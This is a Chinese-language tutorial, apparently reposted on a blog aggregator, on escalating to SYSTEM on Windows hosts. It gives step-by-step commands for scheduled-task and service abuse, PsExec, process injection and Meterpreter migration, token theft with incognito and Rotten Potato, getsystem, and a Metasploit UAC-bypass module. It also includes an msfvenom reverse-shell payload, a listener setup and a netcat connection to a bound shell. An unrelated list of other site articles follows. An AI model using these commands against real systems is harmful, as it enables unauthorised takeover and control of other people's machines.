Windows权限提升—令牌窃取、UAC提权、进程注入等提权

news2024/11/24 17:15:24

Windows权限提升—令牌窃取、UNC提权、进程注入等提权

  • 1. 前言
  • 2. at本地命令提权
    • 2.1. 适用范围
    • 2.2. 命令使用
    • 2.3. 操作步骤
      • 2.3.1. 模拟提权
      • 2.3.2. at配合msf提权
        • 2.3.2.1. 生成木马文件
        • 2.3.2.2. 设置监听
        • 2.3.2.3. 设置反弹
        • 2.3.2.4. 查看反弹效果
  • 3. sc本地命令提权
    • 3.1. 适用范围
    • 3.2. 命令使用
    • 3.3. 操作步骤
  • 4. ps提权
    • 4.1. 适用范围
    • 4.2. 下载链接
    • 4.3. 命令使用
    • 4.4. 操作步骤
      • 4.4.1. 下载psexec.exe工具
      • 4.4.2. 执行psexec.exe工具
  • 5. 进程迁移注入提权
    • 5.1. 前提条件
    • 5.2. pinjector.exe进程注入
      • 5.2.1. 下载链接
      • 5.2.2. 使用命令
      • 5.2.3. 操作步骤
        • 5.2.3.1. 列出所有进程
        • 5.2.3.2. 绑定进程
        • 5.2.3.3. 连接进程
    • 5.3. MSF进程注入
      • 5.3.1. 查看进程
      • 5.3.2. 迁移进程
  • 6. 令牌窃取提权
    • 6.1. 注意事项
    • 6.2. MSF令牌窃取提权
    • 6.3. 烂土豆提权
      • 6.3.1. 烂土豆提权原理
      • 6.3.2. 适用版本
      • 6.3.3. 下载链接
      • 6.3.4. 操作步骤
        • 6.3.4.1. 注意事项
        • 6.3.4.2. 使用烂土豆提权
  • 7. MSF自动化提权
    • 7.1. getsystem提权
      • 7.1.1. getsystem原理
      • 7.1.2. 提权操作
    • 7.2. uac提权
      • 7.2.1. 提权操作
        • 7.2.1.1. 确认getsystem无法提权
        • 7.2.1.2. 搜索uac
        • 7.2.1.3. 使用uac

1. 前言

  在之前的文章中已经对Windows的权限提升进行了介绍,这里同样不再赘述,如果想要去了解Windows权限提升可以看以下的文章,同时也将Windows权限提升其它的几种办法也放在下面的文章中。

  同时本来应该还写一篇第三方全家提权的,但是在实际测试过程中发现,有些第三方提权,如果在电脑上都会自动更新,比如向日葵,低版本的直接无法连接向日葵官方的服务器,那么提个毛权限的啊。

  Windows权限提升—溢出提权

  Windows权限提升—MySQL数据库提权

  Windows权限提升 —SQL Server/MSSQL数据库提权

2. at本地命令提权

  at 是一个发布定时任务计划的命令行工具,语法比较简单。通过 at 命令发布的定时任务计划, Windows 默认以 SYSTEM 权限运行。

2.1. 适用范围

  at本地命令提权主要是用于在Windows2000、Windows 2003、Windows XP 这三类系统中,我们可以轻松将 Administrators 组下的用户权限提升到 SYSTEM。

  其它系统已经不支持提权了。

2.2. 命令使用

语法:at 时间 命令
例子:at 10:45PM calc.exe

2.3. 操作步骤

2.3.1. 模拟提权

  这里可以模拟一下操作提权,使用2003系统,设定一个定时任务,设定10:45分启动cmd .exe,这里可以通过添加“/interactive”开启界面交互模式。

  通过执行定时任务后就会提升权限。

at 10:45 /interactive cmd

在这里插入图片描述

2.3.2. at配合msf提权

  可以在msf下生成一个木马文件,然后在shell交互中设置at命令进行执行程序,上线后即为system权限。

2.3.2.1. 生成木马文件

  通过命令生成一共木马文件,然后将这个木马文件放入2003中去执行,这里其实就是模拟在上传webshell后,上传后门木马文件,然后执行木马文件,只是这里为了方便节省了,直接上传一个木马即可。

  至于运行木马就不演示了。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.20 LPORT=4444 -f exe > shell.exe

在这里插入图片描述

2.3.2.2. 设置监听

  这里设置一个监听,用于接收反弹回来的shell。

msfconsole 
use exploit/multi/handler 
set PAYLOAD windows/meterpreter/reverse_tcp 
set LHOST 192.168.10.20 
set LPORT 4444 
run

在这里插入图片描述

2.3.2.3. 设置反弹

  这里在接收到msf木马反弹回来的shell后,进入shell后执行下面的命令。

at 11:11 C:\111\shell.exe

在这里插入图片描述

2.3.2.4. 查看反弹效果

  通过另外再启动一个监听端口的,来查看新反弹回来的权限是什么,可以看到到11点11分的时候执行shell.exe,反弹回来的就是system权限。

getuid

在这里插入图片描述

3. sc本地命令提权

  sc是用于与服务控制管理器和服务进行通信的命令行程序,提供的功能类似于控制面板中管理工具项中的服务。

3.1. 适用范围

  网上说在windows 7/8,Windows server2003、2008、2012、2016上都能使用,这里的都能只适用于sc这条命令本身。

  而利用sc进行提权,通过测试,目前好像只有2003可以。

3.2. 命令使用

sc Create systemcmd binPath= "cmd /K start" type= own type= interact  #其中systemcmd是服务名称,大家可以随意填写,binpath是启动的命令,type=own是指服务这个服务属于谁,type=interact,cmd/k start 这个命令,这个命令就是启动一个新的cmd窗口。
sc start syscmd     ###启动服务!

3.3. 操作步骤

  这里就是先执行第一条命令,然后在执行第二条命令即可,这里我执行失败是由于我之前已经测试过了,正常情况下应该是第一条命令执行后显示成功。第二条就是这样的,这不不受之前测试的影响。

在这里插入图片描述

4. ps提权

  pstools是微软官方工具,是为windows提供的第三方工具库。

4.1. 适用范围

  在Windows server 2003/2008/2012/2016中测试都是能用的,在Windows 7/8/10由于需要调用服务,而个人主机通常没有这类服务所以就会出现调用失败的情况。

4.2. 下载链接

  PsTools

4.3. 命令使用

psexec.exe -accepteula -s -i -d cmd.exe  ##前面的psexec.exe是工具包中的工具

4.4. 操作步骤

4.4.1. 下载psexec.exe工具

  通过页面上的下载tool工具集合,在压缩包中找到psexec.exe工具。

在这里插入图片描述

4.4.2. 执行psexec.exe工具

  将psexec.exe工具上传至需要提权的系统中,然后执行命令。

在这里插入图片描述

5. 进程迁移注入提权

  进程迁移注入提权就是将获取到权限低的进程注入至进程中权限高的中,这样就实现了权限提升,同时注入进程提权相当于开启了一个后门, 隐蔽性极高,不会创建新的进程,很难发现。

5.1. 前提条件

  这里如果使用的是web权限是无法执行的,必须获取到类似与administrator的权限才能进行进程注入。同时这类提权是不会被杀毒软件拦截的,这是系统的一种特性。

5.2. pinjector.exe进程注入

  pinjector工具实现进程注入,这里需要先下载工具,然后将工具上传需要提权的系统中即可。

5.2.1. 下载链接

  pinjector工具

5.2.2. 使用命令

pinjector.exe -l    ##列取所有进程
pinjector.exe -p <pid> cmd <port>  ##选择一个system权限运行的进程,对此pid进程执行注入,并建立侦听端口

5.2.3. 操作步骤

5.2.3.1. 列出所有进程

  这里通过命令查看所有进程的权限。

在这里插入图片描述

5.2.3.2. 绑定进程

  通过使用命令将权限绑定至system权限的进程中,这里选在进程最好绑定系统进程,这样能够实现开机自启。

在这里插入图片描述

5.2.3.3. 连接进程

  这里使用kali设置个nc连接一下即可。

nc -nv 192.168.10.200 5555

在这里插入图片描述

5.3. MSF进程注入

  首先需要生成一个木马然后让其上线,并连接上去,这里我就用之前已经生成好的木马,就不再生成了,在上面也提到过MSF生成木马的命令。

5.3.1. 查看进程

  在反弹回来的界面输入命令,然后查看所有进程已经相应的权限。

ps ##查看进程

在这里插入图片描述

5.3.2. 迁移进程

  使用命令将进程迁移进拥有system权限的进程中,通过迁移后,再执行命令就可以看到权限已经提升为system了。

migrate PID 迁移进程,这个pid是你选择进程的id号

在这里插入图片描述

6. 令牌窃取提权

  令牌(token)是系统的临时秘钥,相当于账号和密码,用来决定是否允许这次请求和判断这次请求是属于哪一个用户的。它允许你在不提供密码或其他凭证的前提下,访问网络和系统资源,这些令牌将持续存在于系统中,除非系统重新启动。令牌最大的特点就是随机性,不可预测,黑客或软件无法猜测出令牌。

  而令牌窃取就是通过假冒一个网络中的另一个用户进行各类操作。

6.1. 注意事项

  不能保证所有的服务器都能实现令牌窃取,比如我使用Windows server 2003服务器的时候,就没出现NT AUTHORITY\SYSTEM,而没出现NT AUTHORITY\SYSTEM就无法提权到system权限。

6.2. MSF令牌窃取提权

  首先需要将木马上传至需要提权的服务器中,然后执行命令进行令牌窃取提权。

use incognito
list_tokens -u           #列出有的令牌
impersonate_token "NT AUTHORITY\SYSTEM" #窃取system令牌

在这里插入图片描述

6.3. 烂土豆提权

6.3.1. 烂土豆提权原理

  烂土豆(Rotten Potato) MS16-075 提权是一个本地提权,只针对本地用户,不支持域用户。

  欺骗 “NT AUTHORITY\SYSTEM”账户通过NTLM认证到我们控制的TCP终端,对这个认证过程使用中间人攻击(NTLM重放),为“NT AUTHORITY\SYSTEM”账户本地协商一个安全令牌。这个过程是通过一系列的Windows API调用实现的,模仿这个令牌。只有具有“模仿安全令牌权限”的账户才能去模仿别人的令牌。一般大多数的服务型账户(IIS、MSSQL等)有这个权限,大多数用户级的账户没有这个权限。

6.3.2. 适用版本

  Windows 7/8/10,Windows server 2008/2012

6.3.3. 下载链接

  烂土豆ms16-075

6.3.4. 操作步骤

  这里首先需要将烂土豆工具给上传至需要提权的机器中,然后进行执行。

6.3.4.1. 注意事项

  这里网上的教程需要先查看一些条件,我个人的理解是,不如直接进行提权,能成功则能成功,不能成功那就是不能成功,且在现实的环境中,很多提权都会遇到问题。

6.3.4.2. 使用烂土豆提权

  首先执行potato.exe程序,然后再去加载incoginto功能,其次列出目标机器可窃取的令牌,然后在进行窃取。

execute -cH -f ./potato.exe    ##执行烂土豆程序
use incognito                  ##加载窃取功能
list_tokens -u                 ##查看可窃取的令牌
impersonate_token "NT AUTHORITY\SYSTEM"   ##使用令牌

在这里插入图片描述

7. MSF自动化提权

  这个提权其实很简单,这个MSF自动化提权和之前在溢出提权中提到的自动化提权是不一样的,溢出提权中提到的自动化提权是通过比对补丁信息进行提权,而这个是自动化提权是直接输入命令后,MSF自动执行,只会显示提权成功与失败。

7.1. getsystem提权

7.1.1. getsystem原理

  • getsystem创建一个新的Windows服务,设置为SYSTEM运行,当它启动时连接到一个命名管道。
  • getsystem产生一个进程,它创建一个命名管道并等待来自该服务的连接。
  • Windows服务已启动,导致与命名管道建立连接。
  • 该进程接收连接并调用ImpersonateNamedPipeClient,从而为SYSTEM用户创建模拟令牌。

7.1.2. 提权操作

  这里和其它都是一样的,首先需要将木马连接上msf,然后输入命令进行提权。

getsystem ##自动化提权

在这里插入图片描述

7.2. uac提权

  UAC(User Account Control,用户帐户控制)是微软为提高系统安全而在Windows Vista中引入的新技术,它要求用户在执行可能会影响计算机运行的操作或执行更改影响其他用户的设置的操作之前,提供权限或管理员‌密码。

  也就是说一旦用户允许启动的应用程序通过UAC验证,那么这个程序也就有了管理员权限。如果我们通过某种方式劫持了通过用户UAC验证的程序,那么相应的我们的程序也就实现了提权的过程。

7.2.1. 提权操作

7.2.1.1. 确认getsystem无法提权

  这里在反弹回来的时候测试一下getsystem是否无法提权。

在这里插入图片描述

7.2.1.2. 搜索uac

  这里先搜索uac,因为这里面有些uac可能对不同的系统会有不同的作用。

search uac ##搜索

在这里插入图片描述

7.2.1.3. 使用uac

  这里我们使用的是Windows7,那么我们就使用exploit/windows/local/ask来执行。

use exploit/windows/local/ask    ##选择模块
sessions         ##查看后台进程
set session 1    ##选择进程
set lport 5555   ##设置监听端口,有时候返回回来会出现错误,所以就另起一个监听。

在这里插入图片描述

  这里查看一下监听,看看返回的权限,然后在返回的权限中再次使用getsystem,发现能够提权到system权限。

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/417044.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

QT在线换源安装

Win11上Pytorch的安装并在Pycharm上调用PyTorch最新超详细 网上资源越来越多&#xff0c;关于PyTorch的安装教程各式各样&#xff0c;下面我将详细介绍在安装过程中的操作步骤。 经过上述流程图的介绍我们心中对安装过程有了一个大致的轮廓。下面我将对每一步进行细致的说明 步…

深度分析Palantir的投资价值,Palantir2023年将实现强劲反弹?

来源&#xff1a;猛兽财经 作者&#xff1a;猛兽财经 在本文中&#xff0c;猛兽财经将通过对Palantir的股票关键指标、商业模式、盈利能力、影响Palantir2023年股价的关键利好因素等方面&#xff0c;对Palantir进行全面、深度的分析。 Palantir股票的关键指标 自从Palantir(PL…

p74 应急响应-winlinux 分析后门勒索病毒攻击

数据来源 操作系统(windows,linux)应急响应&#xff1a; 常见危害&#xff1a;暴力破解&#xff0c;漏洞利用&#xff0c;流量攻击&#xff0c;木马控制(Webshell,PC 木马等)&#xff0c;病毒感染(挖矿&#xff0c;蠕虫&#xff0c;勒索等)常见分析&#xff1a;计算机账户&…

postman汉化教程

文章目录1. 下载对应版本的postman2.下载对应版本的汉化包2.1. github下载地址 : &#xff08;9.12.2&#xff09;2.2 百度网盘&#xff08;9.12.2&#xff09;3. 打开postman安装位置4. 压缩包解压到/resources目录下5. 重启postman即可汉化成中文了1. 下载对应版本的postman …

Runtime命令参数字符串和数组比较

问题 最近有个问题本地执行 ssh -p 8084 root10.224.122.51 \"ssh -p 22 root192.168.5.157 mkdir -p /opt/dw-release/pdld-admin\"程序执行总是报错&#xff1a; No such file or directory 但是直接在终端执行正常&#xff0c;这就很奇怪。肯定能推出是程序执行…

OSI七层网络模型与TCP/IP四层模型

一、OSI七层网络模型 OSI 七层模型 是国际标准化组织提出一个网络分层模型&#xff0c;其大体结构以及每一层提供的功能如下图所示&#xff1a; 但由于各方面原因&#xff0c;OSI 七层模型并没有被广泛应用&#xff0c;更多的是作为网络分层的一种基础理论模型。 二、TCP/IP…

Oauth2+vue前后端实现单点登录

Oauth2单点登录流程实现 oauth2-demo 介绍 这是一个基于spring cloud oauth2和vue实现的前后端分离的单点登录示例。示例代码:szile/oauth2-demo 后端服务 auth-server 认证服务 ,对应域名:auth.szile.com auth-client 资源服务,对应域名:client.szile.com 角色 浏览器…

肿瘤预测案例中应用自动特征选择

肿瘤预测案例中应用自动特征选择 描述 当特征数量比较多时&#xff0c;模型容易变得更复杂&#xff0c;过拟合的可能性也会增加。这时除了进行降维处理外&#xff0c;还可以通过自动化特征选择选出最重要的部分特征&#xff0c;抛弃对结果影响不大的特征&#xff0c;从而得到…

【创作赢红包】项目信息分析表

项目的背景和问题 项目背景&#xff1a; 很多父母都希望他们的孩子成为优秀的人&#xff0c;但是在实践中&#xff0c;他们的教育方式往往会出现一些与期望不符的情况。这可能是因为这些父母很大程度上是按照自己的父母的教育方式来教育孩子的&#xff0c;这导致一些不太好的…

思科ASA防火墙:控制防火墙不让访问指定网站

环境&#xff1a; 内网客户机&#xff1a;win10 思科asa防火墙 外网客户机&#xff1a;server 2016 win10可以通过域名访问网站 进入asa全局模式 access-list http permit tcp 192.168.6.0 255.255.255.0 any eq www access-list 名字 permit 协议 要被控制的网段 子网…

【C++】3. 缺省参数

文章目录一、缺省参数的定义二、缺省参数的使用规则一、缺省参数的定义 在c语言中&#xff0c;我们使用一个函数时&#xff0c;必须要传对应的参数&#xff0c;少一个都不可以。难道函数的参数就不能有个默认值吗&#xff1f;于是C对c做出了改良&#xff0c;创造了缺省参数。 …

opencv-4.1.2及opencv-contrib_4.1.2编译解决方案

一、首先在官网上下载opencv-4.1.2及opencv_contrib-4.1.2源码&#xff0c;两者需要保持版本一致&#xff0c;注意目录名称不要包含汉字。 二、到官网下载cmake-3.23.1-windows-x86_64 三、安装vs2017 四、安装Qt5.14.1选则msvc2017_32位、msvc2017_64位、mingw_32位、mingw_64…

【MySQL入门指南】数据库基本操作

文章目录MySQL库操作一、SQL语句二、创建数据库1.语法2.案例3.极其不推荐的方式三、查看数据库1.语法四、修改数据库五、删除数据库六、字符集与校验规则1.是什么2.相关指令3.校验规则的影响七、备份数据库1.基本语法2.注意事项MySQL库操作 一、SQL语句 DDL(data definition l…

算法的时间复杂度和空间复杂度(数据结构)

目录 1、算法效率 1>如何衡量一个算法的好坏 2>算法的复杂度 2、时间复杂度 1>时间复杂度的概念 2>大O的渐进表示法 2>时间复杂度计算例题 1、计算Func2的时间复杂度 2、计算Func3的时间复杂度 3、计算Func4的时间复杂度 4、计算strchr的时间复杂度 5、计算Bubb…

Android双目三维重建:Android双目摄像头实现双目测距

Android双目三维重建&#xff1a;Android双目摄像头实现双目测距 目录 Android双目三维重建&#xff1a;Android双目摄像头实现双目测距 1.开发版本 2.Android双目摄像头 3.双目相机标定 (1)双目相机标定-Python版 (2)双目相机标定-Matlab版 4.相机参数配置 5.Android 双…

【微服务笔记11】微服务组件之Hystrix服务监控的三种方式

这篇文章&#xff0c;主要介绍微服务组件之Hystrix服务监控的三种方式。 目录 一、Hystrix服务监控 1.1、Actuator实现服务监控 &#xff08;1&#xff09;引入依赖 &#xff08;2&#xff09;开放hystrix.stream端点 &#xff08;3&#xff09;运行测试 1.2、dashboard实…

分支机构防火墙里面的为PN怎么配置连接总部防火墙

环境&#xff1a; 分部&#xff1a;防火墙 8.0.48 AF-1000BB1510 总部&#xff1a;防火墙 8.0.75 AF-2000-FH2130B-SC 问题描述&#xff1a; 分支机构防火墙里面的为PN怎么配置连接总部防火墙 解决方案&#xff1a; 一、总部防火墙配置 1.sangfor 为pn配置 基本配置&a…

leetcode492. 构造矩形

题目描述解题思路执行结果leetcode 492. 构造矩形题目描述 作为一位web开发者&#xff0c; 懂得怎样去规划一个页面的尺寸是很重要的。 所以&#xff0c;现给定一个具体的矩形页面面积&#xff0c;你的任务是设计一个长度为 L 和宽度为 W 且满足以下要求的矩形的页面。要求&…

实例六:MATLAB APP design- 凸透镜成像光学研究小工具

该博文包含APP设计中Plot和Hold on的用法 在MATLAB APP design中,Hold on对应的代码为app.UIAxes.NextPlot=add; 其中app.UIAxes为坐标区域名字。 注:博文最后链接中包括MATLAB源代码及MATLAB APP design设计代码 一、APP 界面设计展示 注:在文本框中输入焦点和入射点…

含有分布式电源的三相不平衡配电网潮流计算【IEEE33节点】(Matlab代码实现)

&#x1f4a5;&#x1f4a5;&#x1f49e;&#x1f49e;欢迎来到本博客❤️❤️&#x1f4a5;&#x1f4a5; &#x1f3c6;博主优势&#xff1a;&#x1f31e;&#x1f31e;&#x1f31e;博客内容尽量做到思维缜密&#xff0c;逻辑清晰&#xff0c;为了方便读者。 ⛳️座右铭&a…